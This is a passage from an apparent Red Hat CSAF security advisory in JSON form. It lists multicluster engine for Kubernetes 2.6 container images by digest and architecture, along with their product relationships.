"registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "product_identification_helper": {"purl": "pkg:oci/hive-rhel9@sha256%3A1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776286716"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "product_identification_helper": {"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3A221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775691813"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "product_identification_helper": {"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3A5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775950593"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "product_identification_helper": {"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3A2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775950592"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "product_identification_helper": {"purl": "pkg:oci/image-based-install-rhel9@sha256%3A79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776469416"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "product_identification_helper": {"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3Afb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775736638"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "product_identification_helper": {"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3A6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775691793"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "product_identification_helper": {"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3A48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776296534"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "product_identification_helper": {"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3A491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775778326"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "product_identification_helper": {"purl": "pkg:oci/placement-rhel9@sha256%3A54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775977212"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "product_identification_helper": {"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3Acc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776296540"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "product_identification_helper": {"purl": "pkg:oci/registration-rhel9@sha256%3Ad1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775977180"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "product_identification_helper": {"purl": "pkg:oci/registration-operator-rhel9@sha256%3A9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775977181"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "product_identification_helper": {"purl": "pkg:oci/work-rhel9@sha256%3A817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775977184"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le"}, "product_reference": 